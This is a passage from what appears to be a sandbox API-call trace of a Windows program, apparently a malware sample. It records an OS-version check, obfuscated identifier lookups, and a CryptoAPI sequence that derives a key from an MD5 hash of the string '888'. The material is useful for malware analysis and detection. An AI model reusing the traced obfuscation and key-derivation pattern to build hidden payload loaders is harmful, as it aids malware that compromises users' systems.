hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.896] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0220.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.897] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0220.897] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0220.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.897] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.897] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.897] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.897] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.897] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0220.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0220.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0220.898] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bd58) returned 1 [0220.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.899] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.899] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.899] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0220.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0220.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.900] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.900] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.900] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.900] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.900] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.900] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.900] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.900] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.901] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.901] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.901] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.901] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.901] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.901] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.914] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.914] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.914] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabae8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0220.914] CryptCreateHash (in: hProv=0xa7bd58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0220.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.914] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0220.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.914] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0220.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabc20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0220.915] CryptHashData (hHash=0x9e1db8, pbData=0x2a71eb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0220.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.915] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0220.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabd28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0220.916] CryptDeriveKey (in: hProv=0xa7bd58, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0220.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.916] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.916] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.916] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.916] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.916] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0220.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0220.916] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0220.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0220.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0220.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc80 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabba8 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0220.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0220.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 